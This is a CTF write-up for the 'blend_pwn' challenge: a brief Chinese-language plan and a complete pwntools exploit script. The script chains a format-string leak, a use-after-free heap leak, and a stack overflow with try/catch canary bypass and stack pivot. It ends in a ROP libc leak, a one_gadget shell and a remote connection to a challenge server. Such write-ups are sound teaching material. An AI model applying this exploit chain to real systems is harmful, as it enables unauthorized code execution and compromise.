hxb_blend_pwn

blend_pwn

思路

1. 利用格式化字符串漏洞泄漏程序的基址

2. 申请两个堆块，利用UAF泄漏出堆的地址heap，并且在一个堆块上布置好数据（第三部结束后程序栈会跳到这里来执行）

   payload0 = 0x10*b'a'+p64(bss)+p64(rdi)+p64(t+pelf.got['puts'])+p64(
       t+pelf.plt['puts'])+p64(rdi)+p64(bss)+p64(wu)+p64(leave)+p64(bss)

1. 利用栈溢出写入main函数的rbp为heap上的地址，利用try，catch的机制跳转到主函数中的catch执行并绕过canary并且利用之前写入的rbp将栈帧易到我们控制的heap上

2. 利用布置好的数据，获得libc的地址，并且在bss段上（name的位置）写入onegadget地址

3. 利用同样的方法跳转栈帧到bss上，并执行one_gadget获得shell

EXP

'''
puts("\n****************************");
  puts("1.Show your name");
  puts("2.New note");
  puts("3.Delete note");
  puts("4.Show note");
  puts("5.exit");
  return printf("Enter your choice >")
'''

from pwn import *
from pwnlib.ui import pause

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', "-h"]

# p = process("blend_pwn")
p = remote('47.111.104.169', 57804)
elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

# gdb.attach(p)

pelf = ELF("blend_pwn")


def sna():
    p.recvuntil("Enter your choice >")
    p.sendline('1')
    pass


def new(con):
    p.recvuntil("Enter your choice >")
    p.sendline('2')
    p.recvuntil("input note:")
    p.sendline(con)
    pass


def dlt(idx):
    p.recvuntil("Enter your choice >")
    p.sendline('3')
    p.recvuntil("index>")
    p.sendline(idx)

    pass


def sno():
    p.recvuntil("Enter your choice >")
    p.sendline('4')
    pass


p.recvuntil("Please enter a name: ")
p.sendline('%7$p')
sna()
p.recvuntil("Current user:")
t = int(p.recvuntil('\n')[:-1].decode(), 16)-0x1266
print(hex(t))
# pause()

bss = t+0x2020A0
rdi = t+0x13b3
rsi2 = t+0x13b1
main = t+0x1205
leave = t+0x12E6
fg = t+pelf.got['free']
wu=t+0xe22
payload0 = 0x10*b'a'+p64(bss)+p64(rdi)+p64(t+pelf.got['puts'])+p64(
    t+pelf.plt['puts'])+p64(rdi)+p64(bss)+p64(wu)+p64(leave)+p64(bss)
# print(hex(rdi))
print("wu",hex(wu))
print(hex(len(payload0)))
pause()
new(payload0)
new('aaa')

dlt('0')
dlt('1')

sno()
p.recvuntil('index 2:')
heap = u64(p.recvn(6).ljust(8, b'\x00'))
print('heap', hex(heap))

# pause()
p.recvuntil("Enter your choice >")
p.sendline('666')
# heap=0x64321
payload = p64(heap+0x20)*int(0x20/8)+p64(heap+0x20)[:-1]
p.recvuntil("Please input what you want:")
p.sendline(payload)

libc = u64(p.recvn(6).ljust(8, b'\x00'))-elf.sym['puts']
og = libc+0x4527a
print('libc',hex(libc))
print('og', hex(og))
print('fg', hex(fg))
print('bss',hex(bss))
print("leave",hex(leave))
pause()

payload=p64(bss)+p64(og)+0x60*b'\x00'
p.sendline(payload)


p.interactive()